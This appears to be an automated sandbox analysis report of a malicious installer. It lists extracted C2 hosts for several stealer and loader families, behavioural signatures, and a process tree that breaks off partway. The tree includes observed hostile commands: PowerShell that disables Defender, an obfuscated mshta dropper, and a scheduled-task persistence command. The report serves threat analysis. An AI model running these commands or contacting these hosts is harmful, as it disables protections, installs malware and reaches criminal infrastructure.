Resubmissions
28-10-2021 15:53
211028-tbqhfabhb2 1028-10-2021 05:27
211028-f5paksheak 1027-10-2021 14:29
211027-rt28vafah7 10Analysis
-
max time kernel
899s -
max time network
1329s -
submitted
01-01-1970 00:00
General
-
Target
setup_installer.exe
-
Size
4.6MB
-
MD5
b356bccf8b9aff2897ecc42970367f44
-
SHA1
fe06861ac4952834ddc290dd5e0e7f36c8adc018
-
SHA256
b9325691870376c72e29be06648c8106ceefd9a94dbbfbee9a4fc2b76fc9b6d3
-
SHA512
7fc510e5575e36919c302ff053eef6f7cb5700e9e011fb5d85dd80c5ec9c97664dcad8b6607b68b10daf8a6fbc584ff1218c30e541431fd32570da8553c662b7
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
Family
redline
Botnet
chris
C2
194.104.136.5:46013
Extracted
Family
redline
Botnet
media26
C2
91.121.67.60:23325
Extracted
Family
smokeloader
Version
2020
C2
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
41.6
Botnet
933
C2
https://mas.to/@lilocc
Attributes
-
profile_id
933
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Formbook
Formbook is a data stealing malware which is capable of stealing data.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Adds policy Run key to start application 2 TTPs 2 IoCs
-
Blocklisted process makes network request 63 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Tries to connect to .bazar domain 4 IoCs
Attempts to lookup or connect to a .bazar domain, used by BazarBackdoor, Trickbot, and potentially others.
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 43 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 20 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 26 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
-
Suspicious use of SetThreadContext 21 IoCs
-
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in Program Files directory 34 IoCs
-
Drops file in Windows directory 45 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 13 IoCs
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 5 IoCs
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Kills process with taskkill 16 IoCs
-
Modifies Internet Explorer settings 1 TTPs 11 IoCs
-
Modifies data under HKEY_USERS 19 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 30 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0E656616\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09f257bb7877d00b2.exeWed09f257bb7877d00b2.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed096a1bff61.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed096a1bff61.exeWed096a1bff61.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3045238.exe"C:\Users\Admin\AppData\Roaming\3045238.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\8467150.exe"C:\Users\Admin\AppData\Roaming\8467150.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\7780882.exe"C:\Users\Admin\AppData\Roaming\7780882.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\3898642.exe"C:\Users\Admin\AppData\Roaming\3898642.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\4437894.exe"C:\Users\Admin\AppData\Roaming\4437894.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
-
C:\Users\Admin\AppData\Roaming\4624655.exe"C:\Users\Admin\AppData\Roaming\4624655.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\3496843.exe"C:\Users\Admin\AppData\Roaming\3496843.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 2489⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4588 -s 15648⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )11⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )11⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 7968⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 8168⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 8448⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 8008⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"9⤵
- Checks computer location settings
- Loads dropped DLL
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffd8f5ddec0,0x7ffd8f5dded0,0x7ffd8f5ddee010⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff785dc9e70,0x7ff785dc9e80,0x7ff785dc9e9011⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2016 /prefetch:810⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2740 /prefetch:110⤵
- Checks computer location settings
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2656 /prefetch:110⤵
- Checks computer location settings
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2004 /prefetch:810⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1936 /prefetch:210⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=3084 /prefetch:810⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3388 /prefetch:210⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2852 /prefetch:810⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2880 /prefetch:810⤵
- Modifies system certificate store
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=3832 /prefetch:810⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1920,5058435964092630426,15476946153652191940,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5168_965756587" --mojo-platform-channel-handle=2832 /prefetch:810⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4172 -s 15448⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09cfb2f9758281d8.exeWed09cfb2f9758281d8.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 6606⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 6806⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 6486⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 6646⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 9086⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09c42cad92c20f79.exeWed09c42cad92c20f79.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09c42cad92c20f79.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09c42cad92c20f79.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed09c42cad92c20f79.exe" /f7⤵
- Loads dropped DLL
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09e95ff6b5.exeWed09e95ff6b5.exe5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Public\run.exeC:\Users\Public\run.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 2087⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0901eb1dae126e32.exeWed0901eb1dae126e32.exe5⤵
-
